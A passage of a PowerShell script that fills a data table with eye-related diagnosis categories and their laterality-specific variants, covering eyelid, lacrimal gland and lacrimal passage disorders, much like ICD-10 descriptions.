eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Mechanical entropion of eyelid","Mechanical entropion of right upper eyelid") + $null = $DiagnosisList.Rows.Add("Mechanical entropion of eyelid","Mechanical entropion of right lower eyelid") + $null = $DiagnosisList.Rows.Add("Mechanical entropion of eyelid","Mechanical entropion of right eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Mechanical entropion of eyelid","Mechanical entropion of left upper eyelid") + $null = $DiagnosisList.Rows.Add("Mechanical entropion of eyelid","Mechanical entropion of left lower eyelid") + $null = $DiagnosisList.Rows.Add("Mechanical entropion of eyelid","Mechanical entropion of left eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Mechanical entropion of eyelid","Mechanical entropion of unspecified eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Senile entropion of eyelid","Senile entropion of right upper eyelid") + $null = $DiagnosisList.Rows.Add("Senile entropion of eyelid","Senile entropion of right lower eyelid") + $null = $DiagnosisList.Rows.Add("Senile entropion of eyelid","Senile entropion of right eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Senile entropion of eyelid","Senile entropion of left upper eyelid") + $null = $DiagnosisList.Rows.Add("Senile entropion of eyelid","Senile entropion of left lower eyelid") + $null = $DiagnosisList.Rows.Add("Senile entropion of eyelid","Senile entropion of left eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Senile entropion of eyelid","Senile entropion of unspecified eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Spastic entropion of eyelid","Spastic entropion of right upper eyelid") + $null = $DiagnosisList.Rows.Add("Spastic entropion of eyelid","Spastic entropion of right lower eyelid") + $null = $DiagnosisList.Rows.Add("Spastic entropion of eyelid","Spastic entropion of right eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Spastic entropion of eyelid","Spastic entropion of left upper eyelid") + $null = $DiagnosisList.Rows.Add("Spastic entropion of eyelid","Spastic entropion of left lower eyelid") + $null = $DiagnosisList.Rows.Add("Spastic entropion of eyelid","Spastic entropion of left eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Spastic entropion of eyelid","Spastic entropion of unspecified eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Trichiasis without entropion","Trichiasis without entropion right upper eyelid") + $null = $DiagnosisList.Rows.Add("Trichiasis without entropion","Trichiasis without entropion right lower eyelid") + $null = $DiagnosisList.Rows.Add("Trichiasis without entropion","Trichiasis without entropion right eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Trichiasis without entropion","Trichiasis without entropion left upper eyelid") + $null = $DiagnosisList.Rows.Add("Trichiasis without entropion","Trichiasis without entropion left lower eyelid") + $null = $DiagnosisList.Rows.Add("Trichiasis without entropion","Trichiasis without entropion left eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Trichiasis without entropion","Trichiasis without entropion unspecified eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Unspecified ectropion of eyelid","Unspecified ectropion of right upper eyelid") + $null = $DiagnosisList.Rows.Add("Unspecified ectropion of eyelid","Unspecified ectropion of right lower eyelid") + $null = $DiagnosisList.Rows.Add("Unspecified ectropion of eyelid","Unspecified ectropion of right eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Unspecified ectropion of eyelid","Unspecified ectropion of left upper eyelid") + $null = $DiagnosisList.Rows.Add("Unspecified ectropion of eyelid","Unspecified ectropion of left lower eyelid") + $null = $DiagnosisList.Rows.Add("Unspecified ectropion of eyelid","Unspecified ectropion of left eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Unspecified ectropion of eyelid","Unspecified ectropion of unspecified eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Cicatricial ectropion of eyelid","Cicatricial ectropion of right upper eyelid") + $null = $DiagnosisList.Rows.Add("Cicatricial ectropion of eyelid","Cicatricial ectropion of right lower eyelid") + $null = $DiagnosisList.Rows.Add("Cicatricial ectropion of eyelid","Cicatricial ectropion of right eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Cicatricial ectropion of eyelid","Cicatricial ectropion of left upper eyelid") + $null = $DiagnosisList.Rows.Add("Cicatricial ectropion of eyelid","Cicatricial ectropion of left lower eyelid") + $null = $DiagnosisList.Rows.Add("Cicatricial ectropion of eyelid","Cicatricial ectropion of left eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Cicatricial ectropion of eyelid","Cicatricial ectropion of unspecified eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Mechanical ectropion of eyelid","Mechanical ectropion of right upper eyelid") + $null = $DiagnosisList.Rows.Add("Mechanical ectropion of eyelid","Mechanical ectropion of right lower eyelid") + $null = $DiagnosisList.Rows.Add("Mechanical ectropion of eyelid","Mechanical ectropion of right eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Mechanical ectropion of eyelid","Mechanical ectropion of left upper eyelid") + $null = $DiagnosisList.Rows.Add("Mechanical ectropion of eyelid","Mechanical ectropion of left lower eyelid") + $null = $DiagnosisList.Rows.Add("Mechanical ectropion of eyelid","Mechanical ectropion of left eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Mechanical ectropion of eyelid","Mechanical ectropion of unspecified eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Senile ectropion of eyelid","Senile ectropion of right upper eyelid") + $null = $DiagnosisList.Rows.Add("Senile ectropion of eyelid","Senile ectropion of right lower eyelid") + $null = $DiagnosisList.Rows.Add("Senile ectropion of eyelid","Senile ectropion of right eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Senile ectropion of eyelid","Senile ectropion of left upper eyelid") + $null = $DiagnosisList.Rows.Add("Senile ectropion of eyelid","Senile ectropion of left lower eyelid") + $null = $DiagnosisList.Rows.Add("Senile ectropion of eyelid","Senile ectropion of left eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Senile ectropion of eyelid","Senile ectropion of unspecified eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Spastic ectropion of eyelid","Spastic ectropion of right upper eyelid") + $null = $DiagnosisList.Rows.Add("Spastic ectropion of eyelid","Spastic ectropion of right lower eyelid") + $null = $DiagnosisList.Rows.Add("Spastic ectropion of eyelid","Spastic ectropion of right eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Spastic ectropion of eyelid","Spastic ectropion of left upper eyelid") + $null = $DiagnosisList.Rows.Add("Spastic ectropion of eyelid","Spastic ectropion of left lower eyelid") + $null = $DiagnosisList.Rows.Add("Spastic ectropion of eyelid","Spastic ectropion of left eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Spastic ectropion of eyelid","Spastic ectropion of unspecified eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Unspecified lagophthalmos","Unspecified lagophthalmos right upper eyelid") + $null = $DiagnosisList.Rows.Add("Unspecified lagophthalmos","Unspecified lagophthalmos right lower eyelid") + $null = $DiagnosisList.Rows.Add("Unspecified lagophthalmos","Unspecified lagophthalmos right eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Unspecified lagophthalmos","Unspecified lagophthalmos left upper eyelid") + $null = $DiagnosisList.Rows.Add("Unspecified lagophthalmos","Unspecified lagophthalmos left lower eyelid") + $null = $DiagnosisList.Rows.Add("Unspecified lagophthalmos","Unspecified lagophthalmos left eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Unspecified lagophthalmos","Unspecified lagophthalmos unspecified eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Cicatricial lagophthalmos","Cicatricial lagophthalmos right upper eyelid") + $null = $DiagnosisList.Rows.Add("Cicatricial lagophthalmos","Cicatricial lagophthalmos right lower eyelid") + $null = $DiagnosisList.Rows.Add("Cicatricial lagophthalmos","Cicatricial lagophthalmos right eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Cicatricial lagophthalmos","Cicatricial lagophthalmos left upper eyelid") + $null = $DiagnosisList.Rows.Add("Cicatricial lagophthalmos","Cicatricial lagophthalmos left lower eyelid") + $null = $DiagnosisList.Rows.Add("Cicatricial lagophthalmos","Cicatricial lagophthalmos left eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Cicatricial lagophthalmos","Cicatricial lagophthalmos unspecified eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Mechanical lagophthalmos","Mechanical lagophthalmos right upper eyelid") + $null = $DiagnosisList.Rows.Add("Mechanical lagophthalmos","Mechanical lagophthalmos right lower eyelid") + $null = $DiagnosisList.Rows.Add("Mechanical lagophthalmos","Mechanical lagophthalmos right eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Mechanical lagophthalmos","Mechanical lagophthalmos left upper eyelid") + $null = $DiagnosisList.Rows.Add("Mechanical lagophthalmos","Mechanical lagophthalmos left lower eyelid") + $null = $DiagnosisList.Rows.Add("Mechanical lagophthalmos","Mechanical lagophthalmos left eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Mechanical lagophthalmos","Mechanical lagophthalmos unspecified eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Paralytic lagophthalmos","Paralytic lagophthalmos right upper eyelid") + $null = $DiagnosisList.Rows.Add("Paralytic lagophthalmos","Paralytic lagophthalmos right lower eyelid") + $null = $DiagnosisList.Rows.Add("Paralytic lagophthalmos","Paralytic lagophthalmos right eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Paralytic lagophthalmos","Paralytic lagophthalmos left upper eyelid") + $null = $DiagnosisList.Rows.Add("Paralytic lagophthalmos","Paralytic lagophthalmos left lower eyelid") + $null = $DiagnosisList.Rows.Add("Paralytic lagophthalmos","Paralytic lagophthalmos left eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Paralytic lagophthalmos","Paralytic lagophthalmos unspecified eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Blepharochalasis","Blepharochalasis unspecified eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Blepharochalasis","Blepharochalasis right upper eyelid") + $null = $DiagnosisList.Rows.Add("Blepharochalasis","Blepharochalasis right lower eyelid") + $null = $DiagnosisList.Rows.Add("Blepharochalasis","Blepharochalasis right eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Blepharochalasis","Blepharochalasis left upper eyelid") + $null = $DiagnosisList.Rows.Add("Blepharochalasis","Blepharochalasis left lower eyelid") + $null = $DiagnosisList.Rows.Add("Blepharochalasis","Blepharochalasis left eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Unspecified ptosis of eyelid","Unspecified ptosis of right eyelid") + $null = $DiagnosisList.Rows.Add("Unspecified ptosis of eyelid","Unspecified ptosis of left eyelid") + $null = $DiagnosisList.Rows.Add("Unspecified ptosis of eyelid","Unspecified ptosis of bilateral eyelids") + $null = $DiagnosisList.Rows.Add("Unspecified ptosis of eyelid","Unspecified ptosis of unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Mechanical ptosis of eyelid","Mechanical ptosis of right eyelid") + $null = $DiagnosisList.Rows.Add("Mechanical ptosis of eyelid","Mechanical ptosis of left eyelid") + $null = $DiagnosisList.Rows.Add("Mechanical ptosis of eyelid","Mechanical ptosis of bilateral eyelids") + $null = $DiagnosisList.Rows.Add("Mechanical ptosis of eyelid","Mechanical ptosis of unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Myogenic ptosis of eyelid","Myogenic ptosis of right eyelid") + $null = $DiagnosisList.Rows.Add("Myogenic ptosis of eyelid","Myogenic ptosis of left eyelid") + $null = $DiagnosisList.Rows.Add("Myogenic ptosis of eyelid","Myogenic ptosis of bilateral eyelids") + $null = $DiagnosisList.Rows.Add("Myogenic ptosis of eyelid","Myogenic ptosis of unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Paralytic ptosis of eyelid","Paralytic ptosis of right eyelid") + $null = $DiagnosisList.Rows.Add("Paralytic ptosis of eyelid","Paralytic ptosis of left eyelid") + $null = $DiagnosisList.Rows.Add("Paralytic ptosis of eyelid","Paralytic ptosis of bilateral eyelids") + $null = $DiagnosisList.Rows.Add("Paralytic ptosis of eyelid","Paralytic ptosis unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Abnormal innervation syndrome","Abnormal innervation syndrome right upper eyelid") + $null = $DiagnosisList.Rows.Add("Abnormal innervation syndrome","Abnormal innervation syndrome right lower eyelid") + $null = $DiagnosisList.Rows.Add("Abnormal innervation syndrome","Abnormal innervation syndrome right eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Abnormal innervation syndrome","Abnormal innervation syndrome left upper eyelid") + $null = $DiagnosisList.Rows.Add("Abnormal innervation syndrome","Abnormal innervation syndrome left lower eyelid") + $null = $DiagnosisList.Rows.Add("Abnormal innervation syndrome","Abnormal innervation syndrome left eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Abnormal innervation syndrome","Abnormal innervation syndrome unspecified eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Blepharophimosis","Blepharophimosis right upper eyelid") + $null = $DiagnosisList.Rows.Add("Blepharophimosis","Blepharophimosis right lower eyelid") + $null = $DiagnosisList.Rows.Add("Blepharophimosis","Blepharophimosis right eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Blepharophimosis","Blepharophimosis left upper eyelid") + $null = $DiagnosisList.Rows.Add("Blepharophimosis","Blepharophimosis left lower eyelid") + $null = $DiagnosisList.Rows.Add("Blepharophimosis","Blepharophimosis left eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Blepharophimosis","Blepharophimosis unspecified eye, unspecified lid") + $null = $DiagnosisList.Rows.Add("Eyelid retraction","Eyelid retraction right upper eyelid") + $null = $DiagnosisList.Rows.Add("Eyelid retraction","Eyelid retraction right lower eyelid") + $null = $DiagnosisList.Rows.Add("Eyelid retraction","Eyelid retraction right eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Eyelid retraction","Eyelid retraction left upper eyelid") + $null = $DiagnosisList.Rows.Add("Eyelid retraction","Eyelid retraction left lower eyelid") + $null = $DiagnosisList.Rows.Add("Eyelid retraction","Eyelid retraction left eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Eyelid retraction","Eyelid retraction unspecified eye, unspecified lid") + $null = $DiagnosisList.Rows.Add("Other disorders affecting eyelid function","Other disorders affecting eyelid function") + $null = $DiagnosisList.Rows.Add("Xanthelasma of eyelid","Xanthelasma of unspecified eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Xanthelasma of eyelid","Xanthelasma of right upper eyelid") + $null = $DiagnosisList.Rows.Add("Xanthelasma of eyelid","Xanthelasma of right lower eyelid") + $null = $DiagnosisList.Rows.Add("Xanthelasma of eyelid","Xanthelasma of right eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Xanthelasma of eyelid","Xanthelasma of left upper eyelid") + $null = $DiagnosisList.Rows.Add("Xanthelasma of eyelid","Xanthelasma of left lower eyelid") + $null = $DiagnosisList.Rows.Add("Xanthelasma of eyelid","Xanthelasma of left eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Other and unspecified degenerative disorders of eyelid and periocular area","Unspecified degenerative disorders of eyelid and periocular area") + $null = $DiagnosisList.Rows.Add("Chloasma of eyelid and periocular area","Chloasma of right upper eyelid and periocular area") + $null = $DiagnosisList.Rows.Add("Chloasma of eyelid and periocular area","Chloasma of right lower eyelid and periocular area") + $null = $DiagnosisList.Rows.Add("Chloasma of eyelid and periocular area","Chloasma of right eye, unspecified eyelid and periocular area") + $null = $DiagnosisList.Rows.Add("Chloasma of eyelid and periocular area","Chloasma of left upper eyelid and periocular area") + $null = $DiagnosisList.Rows.Add("Chloasma of eyelid and periocular area","Chloasma of left lower eyelid and periocular area") + $null = $DiagnosisList.Rows.Add("Chloasma of eyelid and periocular area","Chloasma of left eye, unspecified eyelid and periocular area") + $null = $DiagnosisList.Rows.Add("Chloasma of eyelid and periocular area","Chloasma of unspecified eye, unspecified eyelid and periocular area") + $null = $DiagnosisList.Rows.Add("Madarosis of eyelid and periocular area","Madarosis of right upper eyelid and periocular area") + $null = $DiagnosisList.Rows.Add("Madarosis of eyelid and periocular area","Madarosis of right lower eyelid and periocular area") + $null = $DiagnosisList.Rows.Add("Madarosis of eyelid and periocular area","Madarosis of right eye, unspecified eyelid and periocular area") + $null = $DiagnosisList.Rows.Add("Madarosis of eyelid and periocular area","Madarosis of left upper eyelid and periocular area") + $null = $DiagnosisList.Rows.Add("Madarosis of eyelid and periocular area","Madarosis of left lower eyelid and periocular area") + $null = $DiagnosisList.Rows.Add("Madarosis of eyelid and periocular area","Madarosis of left eye, unspecified eyelid and periocular area") + $null = $DiagnosisList.Rows.Add("Madarosis of eyelid and periocular area","Madarosis of unspecified eye, unspecified eyelid and periocular area") + $null = $DiagnosisList.Rows.Add("Vitiligo of eyelid and periocular area","Vitiligo of right upper eyelid and periocular area") + $null = $DiagnosisList.Rows.Add("Vitiligo of eyelid and periocular area","Vitiligo of right lower eyelid and periocular area") + $null = $DiagnosisList.Rows.Add("Vitiligo of eyelid and periocular area","Vitiligo of right eye, unspecified eyelid and periocular area") + $null = $DiagnosisList.Rows.Add("Vitiligo of eyelid and periocular area","Vitiligo of left upper eyelid and periocular area") + $null = $DiagnosisList.Rows.Add("Vitiligo of eyelid and periocular area","Vitiligo of left lower eyelid and periocular area") + $null = $DiagnosisList.Rows.Add("Vitiligo of eyelid and periocular area","Vitiligo of left eye, unspecified eyelid and periocular area") + $null = $DiagnosisList.Rows.Add("Vitiligo of eyelid and periocular area","Vitiligo of unspecified eye, unspecified eyelid and periocular area") + $null = $DiagnosisList.Rows.Add("Other degenerative disorders of eyelid and periocular area","Other degenerative disorders of eyelid and periocular area") + $null = $DiagnosisList.Rows.Add("Retained foreign body in eyelid","Retained foreign body in right upper eyelid") + $null = $DiagnosisList.Rows.Add("Retained foreign body in eyelid","Retained foreign body in right lower eyelid") + $null = $DiagnosisList.Rows.Add("Retained foreign body in eyelid","Retained foreign body in right eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Retained foreign body in eyelid","Retained foreign body in left upper eyelid") + $null = $DiagnosisList.Rows.Add("Retained foreign body in eyelid","Retained foreign body in left lower eyelid") + $null = $DiagnosisList.Rows.Add("Retained foreign body in eyelid","Retained foreign body in left eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Retained foreign body in eyelid","Retained foreign body in unspecified eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Cysts of eyelid","Cysts of right upper eyelid") + $null = $DiagnosisList.Rows.Add("Cysts of eyelid","Cysts of right lower eyelid") + $null = $DiagnosisList.Rows.Add("Cysts of eyelid","Cysts of right eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Cysts of eyelid","Cysts of left upper eyelid") + $null = $DiagnosisList.Rows.Add("Cysts of eyelid","Cysts of left lower eyelid") + $null = $DiagnosisList.Rows.Add("Cysts of eyelid","Cysts of left eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Cysts of eyelid","Cysts of unspecified eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Dermatochalasis of eyelid","Dermatochalasis of right upper eyelid") + $null = $DiagnosisList.Rows.Add("Dermatochalasis of eyelid","Dermatochalasis of right lower eyelid") + $null = $DiagnosisList.Rows.Add("Dermatochalasis of eyelid","Dermatochalasis of right eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Dermatochalasis of eyelid","Dermatochalasis of left upper eyelid") + $null = $DiagnosisList.Rows.Add("Dermatochalasis of eyelid","Dermatochalasis of left lower eyelid") + $null = $DiagnosisList.Rows.Add("Dermatochalasis of eyelid","Dermatochalasis of left eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Dermatochalasis of eyelid","Dermatochalasis of unspecified eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Edema of eyelid","Edema of right upper eyelid") + $null = $DiagnosisList.Rows.Add("Edema of eyelid","Edema of right lower eyelid") + $null = $DiagnosisList.Rows.Add("Edema of eyelid","Edema of right eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Edema of eyelid","Edema of left upper eyelid") + $null = $DiagnosisList.Rows.Add("Edema of eyelid","Edema of left lower eyelid") + $null = $DiagnosisList.Rows.Add("Edema of eyelid","Edema of left eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Edema of eyelid","Edema of unspecified eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Elephantiasis of eyelid","Elephantiasis of right upper eyelid") + $null = $DiagnosisList.Rows.Add("Elephantiasis of eyelid","Elephantiasis of right lower eyelid") + $null = $DiagnosisList.Rows.Add("Elephantiasis of eyelid","Elephantiasis of right eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Elephantiasis of eyelid","Elephantiasis of left upper eyelid") + $null = $DiagnosisList.Rows.Add("Elephantiasis of eyelid","Elephantiasis of left lower eyelid") + $null = $DiagnosisList.Rows.Add("Elephantiasis of eyelid","Elephantiasis of left eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Elephantiasis of eyelid","Elephantiasis of unspecified eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Hypertrichosis of eyelid","Hypertrichosis of right upper eyelid") + $null = $DiagnosisList.Rows.Add("Hypertrichosis of eyelid","Hypertrichosis of right lower eyelid") + $null = $DiagnosisList.Rows.Add("Hypertrichosis of eyelid","Hypertrichosis of right eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Hypertrichosis of eyelid","Hypertrichosis of left upper eyelid") + $null = $DiagnosisList.Rows.Add("Hypertrichosis of eyelid","Hypertrichosis of left lower eyelid") + $null = $DiagnosisList.Rows.Add("Hypertrichosis of eyelid","Hypertrichosis of left eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Hypertrichosis of eyelid","Hypertrichosis of unspecified eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Vascular anomalies of eyelid","Vascular anomalies of right upper eyelid") + $null = $DiagnosisList.Rows.Add("Vascular anomalies of eyelid","Vascular anomalies of right lower eyelid") + $null = $DiagnosisList.Rows.Add("Vascular anomalies of eyelid","Vascular anomalies of right eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Vascular anomalies of eyelid","Vascular anomalies of left upper eyelid") + $null = $DiagnosisList.Rows.Add("Vascular anomalies of eyelid","Vascular anomalies of left lower eyelid") + $null = $DiagnosisList.Rows.Add("Vascular anomalies of eyelid","Vascular anomalies of left eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Vascular anomalies of eyelid","Vascular anomalies of unspecified eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Other specified disorders of eyelid","Other specified disorders of eyelid") + $null = $DiagnosisList.Rows.Add("Unspecified disorder of eyelid","Unspecified disorder of eyelid") + $null = $DiagnosisList.Rows.Add("Unspecified dacryoadenitis","Unspecified dacryoadenitis, right lacrimal gland") + $null = $DiagnosisList.Rows.Add("Unspecified dacryoadenitis","Unspecified dacryoadenitis, left lacrimal gland") + $null = $DiagnosisList.Rows.Add("Unspecified dacryoadenitis","Unspecified dacryoadenitis, bilateral lacrimal glands") + $null = $DiagnosisList.Rows.Add("Unspecified dacryoadenitis","Unspecified dacryoadenitis, unspecified lacrimal gland") + $null = $DiagnosisList.Rows.Add("Acute dacryoadenitis","Acute dacryoadenitis, right lacrimal gland") + $null = $DiagnosisList.Rows.Add("Acute dacryoadenitis","Acute dacryoadenitis, left lacrimal gland") + $null = $DiagnosisList.Rows.Add("Acute dacryoadenitis","Acute dacryoadenitis, bilateral lacrimal glands") + $null = $DiagnosisList.Rows.Add("Acute dacryoadenitis","Acute dacryoadenitis, unspecified lacrimal gland") + $null = $DiagnosisList.Rows.Add("Chronic dacryoadenitis","Chronic dacryoadenitis, right lacrimal gland") + $null = $DiagnosisList.Rows.Add("Chronic dacryoadenitis","Chronic dacryoadenitis, left lacrimal gland") + $null = $DiagnosisList.Rows.Add("Chronic dacryoadenitis","Chronic dacryoadenitis, bilateral lacrimal gland") + $null = $DiagnosisList.Rows.Add("Chronic dacryoadenitis","Chronic dacryoadenitis, unspecified lacrimal gland") + $null = $DiagnosisList.Rows.Add("Chronic enlargement of lacrimal gland","Chronic enlargement of right lacrimal gland") + $null = $DiagnosisList.Rows.Add("Chronic enlargement of lacrimal gland","Chronic enlargement of left lacrimal gland") + $null = $DiagnosisList.Rows.Add("Chronic enlargement of lacrimal gland","Chronic enlargement of bilateral lacrimal glands") + $null = $DiagnosisList.Rows.Add("Chronic enlargement of lacrimal gland","Chronic enlargement of unspecified lacrimal gland") + $null = $DiagnosisList.Rows.Add("Dacryops","Dacryops of right lacrimal gland") + $null = $DiagnosisList.Rows.Add("Dacryops","Dacryops of left lacrimal gland") + $null = $DiagnosisList.Rows.Add("Dacryops","Dacryops of bilateral lacrimal glands") + $null = $DiagnosisList.Rows.Add("Dacryops","Dacryops of unspecified lacrimal gland") + $null = $DiagnosisList.Rows.Add("Dry eye syndrome","Dry eye syndrome of right lacrimal gland") + $null = $DiagnosisList.Rows.Add("Dry eye syndrome","Dry eye syndrome of left lacrimal gland") + $null = $DiagnosisList.Rows.Add("Dry eye syndrome","Dry eye syndrome of bilateral lacrimal glands") + $null = $DiagnosisList.Rows.Add("Dry eye syndrome","Dry eye syndrome of unspecified lacrimal gland") + $null = $DiagnosisList.Rows.Add("Lacrimal cyst","Lacrimal cyst, right lacrimal gland") + $null = $DiagnosisList.Rows.Add("Lacrimal cyst","Lacrimal cyst, left lacrimal gland") + $null = $DiagnosisList.Rows.Add("Lacrimal cyst","Lacrimal cyst, bilateral lacrimal glands") + $null = $DiagnosisList.Rows.Add("Lacrimal cyst","Lacrimal cyst, unspecified lacrimal gland") + $null = $DiagnosisList.Rows.Add("Primary lacrimal gland atrophy","Primary lacrimal gland atrophy, right lacrimal gland") + $null = $DiagnosisList.Rows.Add("Primary lacrimal gland atrophy","Primary lacrimal gland atrophy, left lacrimal gland") + $null = $DiagnosisList.Rows.Add("Primary lacrimal gland atrophy","Primary lacrimal gland atrophy, bilateral lacrimal glands") + $null = $DiagnosisList.Rows.Add("Primary lacrimal gland atrophy","Primary lacrimal gland atrophy, unspecified lacrimal gland") + $null = $DiagnosisList.Rows.Add("Secondary lacrimal gland atrophy","Secondary lacrimal gland atrophy, right lacrimal gland") + $null = $DiagnosisList.Rows.Add("Secondary lacrimal gland atrophy","Secondary lacrimal gland atrophy, left lacrimal gland") + $null = $DiagnosisList.Rows.Add("Secondary lacrimal gland atrophy","Secondary lacrimal gland atrophy, bilateral lacrimal glands") + $null = $DiagnosisList.Rows.Add("Secondary lacrimal gland atrophy","Secondary lacrimal gland atrophy, unspecified lacrimal gland") + $null = $DiagnosisList.Rows.Add("Lacrimal gland dislocation","Lacrimal gland dislocation, right lacrimal gland") + $null = $DiagnosisList.Rows.Add("Lacrimal gland dislocation","Lacrimal gland dislocation, left lacrimal gland") + $null = $DiagnosisList.Rows.Add("Lacrimal gland dislocation","Lacrimal gland dislocation, bilateral lacrimal glands") + $null = $DiagnosisList.Rows.Add("Lacrimal gland dislocation","Lacrimal gland dislocation, unspecified lacrimal gland") + $null = $DiagnosisList.Rows.Add("Other specified disorders of lacrimal gland","Other specified disorders of lacrimal gland") + $null = $DiagnosisList.Rows.Add("Unspecified epiphora","Unspecified epiphora, right lacrimal gland") + $null = $DiagnosisList.Rows.Add("Unspecified epiphora","Unspecified epiphora, left lacrimal gland") + $null = $DiagnosisList.Rows.Add("Unspecified epiphora","Unspecified epiphora, bilateral lacrimal glands") + $null = $DiagnosisList.Rows.Add("Unspecified epiphora","Unspecified epiphora, unspecified lacrimal gland") + $null = $DiagnosisList.Rows.Add("Epiphora due to excess lacrimation","Epiphora due to excess lacrimation, right lacrimal gland") + $null = $DiagnosisList.Rows.Add("Epiphora due to excess lacrimation","Epiphora due to excess lacrimation, left lacrimal gland") + $null = $DiagnosisList.Rows.Add("Epiphora due to excess lacrimation","Epiphora due to excess lacrimation, bilateral lacrimal glands") + $null = $DiagnosisList.Rows.Add("Epiphora due to excess lacrimation","Epiphora due to excess lacrimation, unspecified lacrimal gland") + $null = $DiagnosisList.Rows.Add("Epiphora due to insufficient drainage","Epiphora due to insufficient drainage, right lacrimal gland") + $null = $DiagnosisList.Rows.Add("Epiphora due to insufficient drainage","Epiphora due to insufficient drainage, left lacrimal gland") + $null = $DiagnosisList.Rows.Add("Epiphora due to insufficient drainage","Epiphora due to insufficient drainage, bilateral lacrimal glands") + $null = $DiagnosisList.Rows.Add("Epiphora due to insufficient drainage","Epiphora due to insufficient drainage, unspecified lacrimal gland") + $null = $DiagnosisList.Rows.Add("Unspecified dacryocystitis","Unspecified dacryocystitis of right lacrimal passage") + $null = $DiagnosisList.Rows.Add("Unspecified dacryocystitis","Unspecified dacryocystitis of left lacrimal passage") + $null = $DiagnosisList.Rows.Add("Unspecified dacryocystitis","Unspecified dacryocystitis of bilateral lacrimal passages") + $null = $DiagnosisList.Rows.Add("Unspecified dacryocystitis","Unspecified dacryocystitis of unspecified lacrimal passage") + $null = $DiagnosisList.Rows.Add("Phlegmonous dacryocystitis","Phlegmonous dacryocystitis of right lacrimal passage") + $null = $DiagnosisList.Rows.Add("Phlegmonous dacryocystitis","Phlegmonous dacryocystitis of left lacrimal passage") + $null = $DiagnosisList.Rows.Add("Phlegmonous dacryocystitis","Phlegmonous dacryocystitis of bilateral lacrimal passages") + $null = $DiagnosisList.Rows.Add("Phlegmonous dacryocystitis","Phlegmonous dacryocystitis of unspecified lacrimal passage") + $null = $DiagnosisList.Rows.Add("Acute dacryocystitis","Acute dacryocystitis of right lacrimal passage") + $null = $DiagnosisList.Rows.Add("Acute dacryocystitis","Acute dacryocystitis of left lacrimal passage") + $null = 